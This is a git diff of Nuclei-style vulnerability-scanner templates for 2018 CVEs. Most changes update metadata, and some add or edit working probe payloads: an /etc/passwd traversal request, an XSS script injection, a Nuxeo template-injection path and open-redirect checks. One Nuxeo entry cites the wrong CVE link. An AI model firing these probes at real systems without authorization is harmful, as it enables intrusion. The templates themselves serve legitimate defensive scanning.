+  tags: cve2018,redirect,orangeforum,oss,seclists,cve
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
+      - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
+
+    stop-at-first-match: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml
index 1ae3602c19..97cad4590b 100644
--- a/cves/2018/CVE-2018-14574.yaml
+++ b/cves/2018/CVE-2018-14574.yaml
@@ -8,9 +8,9 @@ info:
   reference:
     - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/
     - https://usn.ubuntu.com/3726-1/
-    - http://www.securitytracker.com/id/1041403
+    - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403
     - https://www.debian.org/security/2018/dsa-4264
-    - http://www.securityfocus.com/bid/104970
+    - http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/
     - https://access.redhat.com/errata/RHSA-2019:0265
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -22,7 +22,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}//www.example.com"
+      - "{{BaseURL}}//www.interact.sh"
 
     matchers-condition: and
     matchers:
@@ -31,6 +31,6 @@ requests:
           - 301
       - type: word
         words:
-          - "Location: https://www.example.com"
-          - "Location: http://www.example.com"
+          - "Location: https://www.interact.sh"
+          - "Location: http://www.interact.sh"
         part: header
diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml
index ab3eb88100..7b0b0a9847 100644
--- a/cves/2018/CVE-2018-14728.yaml
+++ b/cves/2018/CVE-2018-14728.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-14728
     cwe-id: CWE-918
-  tags: cve,cve2018,ssrf,lfi
+  tags: cve,cve2018,ssrf,lfi,packetstorm,edb
 
 requests:
   - method: POST
diff --git a/cves/2018/CVE-2018-14912.yaml b/cves/2018/CVE-2018-14912.yaml
index 97f7804fd0..ccb43cade4 100644
--- a/cves/2018/CVE-2018-14912.yaml
+++ b/cves/2018/CVE-2018-14912.yaml
@@ -3,11 +3,13 @@ id: CVE-2018-14912
 info:
   name: cgit < 1.2.1 Directory Traversal
   author: 0x_Akoko
-  severity: critical
+  severity: high
   description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
   reference:
     - https://cxsecurity.com/issue/WLB-2018080034
     - https://nvd.nist.gov/vuln/detail/CVE-2018-14912
+    - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html
+    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2018/CVE-2018-14916.yaml b/cves/2018/CVE-2018-14916.yaml
index e4673b98bb..c3c07b6c0c 100644
--- a/cves/2018/CVE-2018-14916.yaml
+++ b/cves/2018/CVE-2018-14916.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-14916
+    - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
+    - https://seclists.org/fulldisclosure/2019/Apr/12
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
-    cvss-score: 9.4
+    cvss-score: 9.1
     cve-id: CVE-2018-14916
     cwe-id: CWE-732
-  tags: cve,cve2018,loytec,lfi
+  tags: cve2018,loytec,lfi,packetstorm,seclists,cve
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-14918.yaml b/cves/2018/CVE-2018-14918.yaml
new file mode 100644
index 0000000000..4c75905015
--- /dev/null
+++ b/cves/2018/CVE-2018-14918.yaml
@@ -0,0 +1,39 @@
+id: CVE-2018-14918
+
+info:
+  name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: |
+    LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
+  reference:
+    - https://seclists.org/fulldisclosure/2019/Apr/12
+    - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14918
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-14918
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"LGATE-902"
+    verified: "true"
+  tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/07
diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml
index 8ebe30174c..884a14b46c 100644
--- a/cves/2018/CVE-2018-14931.yaml
+++ b/cves/2018/CVE-2018-14931.yaml
@@ -3,13 +3,13 @@ id: CVE-2018-14931
 info:
   name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect
   author: 0x_Akoko
-  severity: low
-  description: "Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI."
+  severity: medium
+  description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
   reference:
     - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
     - https://www.cvedetails.com/cve/CVE-2018-14931
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-14931
     cwe-id: CWE-601
@@ -19,12 +19,12 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
+      - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/04/26
diff --git a/cves/2018/CVE-2018-15138.yaml b/cves/2018/CVE-2018-15138.yaml
index 912feea232..66de15d9a8 100644
--- a/cves/2018/CVE-2018-15138.yaml
+++ b/cves/2018/CVE-2018-15138.yaml
@@ -1,19 +1,20 @@
 id: CVE-2018-15138
 
 info:
-  name: LG-Ericsson iPECS NMS 30M Directory Traversal
+  name: LG-Ericsson iPECS NMS 30M - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
+  description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs.
   reference:
     - https://cxsecurity.com/issue/WLB-2018080070
+    - https://www.exploit-db.com/exploits/45167/
     - https://nvd.nist.gov/vuln/detail/CVE-2018-15138
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-15138
     cwe-id: CWE-22
-  tags: cve,cve2018,ericsson,lfi,traversal
+  tags: cve,cve2018,ericsson,lfi,traversal,edb
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/07
diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml
deleted file mode 100644
index bfc9b78a92..0000000000
--- a/cves/2018/CVE-2018-15473.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2018-15473
-
-info:
-  name: OpenSSH Username Enumeration <= v7.7
-  author: r3dg33k,daffainfo,forgedhallpass
-  severity: medium
-  description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed,
-    related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
-    cve-id: CVE-2018-15473
-    cwe-id: CWE-362
-  tags: network,openssh,cve,cve2018
-
-network:
-  - host:
-      - "{{Hostname}}"
-      - "{{Host}}:22"
-
-    matchers:
-      - type: regex
-        regex:
-          - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
-
-    extractors:
-      - type: regex
-        regex:
-          - '(?i)SSH-2.0-OpenSSH_[^\r]+'
diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml
index 08b7fb93d4..dba6b48847 100644
--- a/cves/2018/CVE-2018-15517.yaml
+++ b/cves/2018/CVE-2018-15517.yaml
@@ -4,18 +4,18 @@ info:
   name: D-Link Central WifiManager - Server-Side Request Forgery
   author: gy741
   severity: high
-  description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP
-    server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or
-    connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
+  description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
   reference:
     - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
+    - http://seclists.org/fulldisclosure/2018/Nov/28
+    - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
     cvss-score: 8.6
     cve-id: CVE-2018-15517
     cwe-id: CWE-918
-  tags: cve,cve2018,dlink,ssrf,oast
+  tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml
index 5a99d66ebc..dc43fc3afd 100644
--- a/cves/2018/CVE-2018-15535.yaml
+++ b/cves/2018/CVE-2018-15535.yaml
@@ -1,20 +1,21 @@
 id: CVE-2018-15535
 
 info:
-  name: Responsive FileManager < 9.13.4 - Directory Traversal
+  name: Responsive FileManager <9.13.4 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize
-    get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
+  description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/45271
-    - https://www.cvedetails.com/cve/CVE-2018-15535
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-15535
+    - http://seclists.org/fulldisclosure/2018/Aug/34
+    - https://www.exploit-db.com/exploits/45271/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-15535
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi
+  tags: cve,cve2018,lfi,edb,seclists
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2018/CVE-2018-15745.yaml b/cves/2018/CVE-2018-15745.yaml
index 588e3f7577..cfc970e20a 100644
--- a/cves/2018/CVE-2018-15745.yaml
+++ b/cves/2018/CVE-2018-15745.yaml
@@ -1,18 +1,22 @@
 id: CVE-2018-15745
 
 info:
-  name: Argus Surveillance DVR - Directory Traversal
+  name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
   author: gy741
   severity: high
-  description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
+  description: |
+    Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
   reference:
     - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
+    - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html
+    - https://www.exploit-db.com/exploits/45296/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-15745
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-15745
     cwe-id: CWE-22
-  tags: cve,cve2018,argussurveillance,lfi
+  tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr
 
 requests:
   - method: GET
@@ -21,9 +25,6 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
         part: body
@@ -31,3 +32,8 @@ requests:
           - "for 16-bit app support"
           - "[drivers]"
         condition: and
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml
index 05a20f9e9f..ce5f4adb15 100644
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2018-15961
     - https://github.com/xbufu/CVE-2018-15961
+    - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html
+    - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -15,7 +17,7 @@ info:
     cwe-id: CWE-434
   metadata:
     shodan-query: http.component:"Adobe ColdFusion"
-  tags: cve,cve2018,adobe,rce,coldfusion,fileupload
+  tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml
index efc18c1046..1231fa357a 100644
--- a/cves/2018/CVE-2018-16059.yaml
+++ b/cves/2018/CVE-2018-16059.yaml
@@ -1,19 +1,21 @@
 id: CVE-2018-16059
 
 info:
-  name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
+  name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
   author: daffainfo
   severity: medium
-  description: Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
+  description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
     - https://www.exploit-db.com/exploits/45342
+    - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
+    - https://www.exploit-db.com/exploits/45342/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-16059
     cwe-id: CWE-22
-  tags: cve,cve2018,iot,lfi
+  tags: cve,cve2018,iot,lfi,edb
 
 requests:
   - method: POST
@@ -31,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-16133.yaml b/cves/2018/CVE-2018-16133.yaml
index c3783e4e05..3603632a5a 100644
--- a/cves/2018/CVE-2018-16133.yaml
+++ b/cves/2018/CVE-2018-16133.yaml
@@ -1,20 +1,22 @@
 id: CVE-2018-16133
 
 info:
-  name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal
+  name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
   author: 0x_Akoko
   severity: medium
-  description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI.
+  description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
   reference:
     - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
     - http://www.cybrotech.com/
     - https://www.cvedetails.com/cve/CVE-2018-16133
+    - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16133
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-16133
     cwe-id: CWE-22
-  tags: cve,cve2018,cybrotech,lfi
+  tags: lfi,packetstorm,cve,cve2018,cybrotech
 
 requests:
   - raw:
@@ -31,3 +33,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-16139.yaml b/cves/2018/CVE-2018-16139.yaml
new file mode 100644
index 0000000000..99b9302756
--- /dev/null
+++ b/cves/2018/CVE-2018-16139.yaml
@@ -0,0 +1,42 @@
+id: CVE-2018-16139
+
+info:
+  name: BIBLIOsoft BIBLIOpac 2008 - Cross Site Scripting
+  author: atomiczsec
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in BIBLIOsoft BIBLIOpac 2008 allows remote attackers to inject arbitrary web script or HTML via the db or action parameter to to bin/wxis.exe/bibliopac/.
+  reference:
+    - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16139
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16139
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-16139
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    shodan-query: title:"Bibliopac"
+  tags: cve,cve2018,xss,bibliopac,bibliosoft
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>prompt(document.domain)</script>.xrf'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml
index 926b4dd68b..289d39253d 100644
--- a/cves/2018/CVE-2018-16167.yaml
+++ b/cves/2018/CVE-2018-16167.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/49918
     - https://nvd.nist.gov/vuln/detail/CVE-2018-16167
+    - https://jvn.jp/en/vu/JVNVU98026636/index.html
+    - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-16167
     cwe-id: CWE-78
-  tags: cve,cve2018,logontracer,rce,oast
+  tags: rce,oast,edb,cve,cve2018,logontracer
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml
index f59986f0ef..ee97c7633f 100644
--- a/cves/2018/CVE-2018-16283.yaml
+++ b/cves/2018/CVE-2018-16283.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/45438
     - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
+    - https://github.com/springjk/wordpress-wechat-broadcast/issues/14
+    - http://seclists.org/fulldisclosure/2018/Sep/32
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-16283
     cwe-id: CWE-22
-  tags: cve,cve2018,wordpress,wp-plugin,lfi
+  tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml
index 944ad88093..55c71c27a6 100644
--- a/cves/2018/CVE-2018-16288.yaml
+++ b/cves/2018/CVE-2018-16288.yaml
@@ -4,16 +4,18 @@ info:
   name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
+  description: |
+    LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/45440
-    - https://www.cvedetails.com/cve/CVE-2018-16288
+    - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16288
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cve-id: CVE-2018-16288
     cwe-id: CWE-200
-  tags: cve,cve2018,lfi
+  tags: cve,cve2018,lfi,supersign,edb
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml
index 0188bb8a68..7f56baa72a 100644
--- a/cves/2018/CVE-2018-16299.yaml
+++ b/cves/2018/CVE-2018-16299.yaml
@@ -1,18 +1,22 @@
 id: CVE-2018-16299
 
 info:
-  name: WordPress Plugin Localize My Post 1.0 - LFI
+  name: WordPress Localize My Post 1.0 - Local File Inclusion
   author: 0x_Akoko,0x240x23elu
   severity: high
-  description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
+  description: |
+    WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
   reference:
     - https://www.exploit-db.com/exploits/45439
+    - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
+    - https://github.com/julianburr/wp-plugin-localizemypost/issues/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16299
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-16299
     cwe-id: CWE-22
-  tags: wordpress,cve2018,cve,lfi,plugin
+  tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018
 
 requests:
   - method: GET
@@ -29,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-16341.yaml b/cves/2018/CVE-2018-16341.yaml
index 03c9ed3efd..4e7c94456e 100644
--- a/cves/2018/CVE-2018-16341.yaml
+++ b/cves/2018/CVE-2018-16341.yaml
@@ -1,20 +1,26 @@
 id: CVE-2018-16341
 
 info:
-  name: Nuxeo Authentication Bypass Remote Code Execution
+  name: Nuxeo <10.3 - Remote Code Execution
   author: madrobot
   severity: high
-  description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
+  description: |
+    Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
   classification:
     cve-id: CVE-2018-16341
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16299
   tags: cve,cve2018,nuxeo,ssti,rce,bypass
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
+
     matchers:
       - type: word
+        part: body
         words:
           - "31333333337"
-        part: body
+
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-16668.yaml b/cves/2018/CVE-2018-16668.yaml
index 1649b0b7f0..be05af0d79 100644
--- a/cves/2018/CVE-2018-16668.yaml
+++ b/cves/2018/CVE-2018-16668.yaml
@@ -7,12 +7,14 @@ info:
   description: System software installation path disclosure due to lack of authentication
   reference:
     - https://www.exploit-db.com/exploits/45384
+    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
+    - https://www.exploit-db.com/exploits/45384/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-16668
     cwe-id: CWE-287
-  tags: cve,cve2018,circarlife,scada,iot,disclosure
+  tags: cve,cve2018,circarlife,scada,iot,disclosure,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-16670.yaml b/cves/2018/CVE-2018-16670.yaml
index af83e5319a..d10487f089 100644
--- a/cves/2018/CVE-2018-16670.yaml
+++ b/cves/2018/CVE-2018-16670.yaml
@@ -7,12 +7,14 @@ info:
   description: PLC status disclosure due to lack of authentication
   reference:
     - https://www.exploit-db.com/exploits/45384
+    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
+    - https://www.exploit-db.com/exploits/45384/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-16670
     cwe-id: CWE-287
-  tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
+  tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-16671.yaml b/cves/2018/CVE-2018-16671.yaml
index 9d05101b16..ac48bb33d4 100644
--- a/cves/2018/CVE-2018-16671.yaml
+++ b/cves/2018/CVE-2018-16671.yaml
@@ -7,12 +7,14 @@ info:
   description: System software information disclosure due to lack of authentication
   reference:
     - https://www.exploit-db.com/exploits/45384
+    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
+    - https://www.exploit-db.com/exploits/45384/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2018-16671
     cwe-id: CWE-200
-  tags: cve,cve2018,circarlife,scada,iot,disclosure
+  tags: iot,disclosure,edb,cve,cve2018,circarlife,scada
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-16716.yaml b/cves/2018/CVE-2018-16716.yaml
index 730fa8fcb8..b74af567f1 100644
--- a/cves/2018/CVE-2018-16716.yaml
+++ b/cves/2018/CVE-2018-16716.yaml
@@ -3,15 +3,14 @@ id: CVE-2018-16716
 info:
   name: NCBI ToolBox - Directory Traversal
   author: 0x_Akoko
-  severity: high
-  description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure)
-    or file deletion via the nph-viewgif.cgi query string.
+  severity: critical
+  description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
   reference:
     - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
     - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
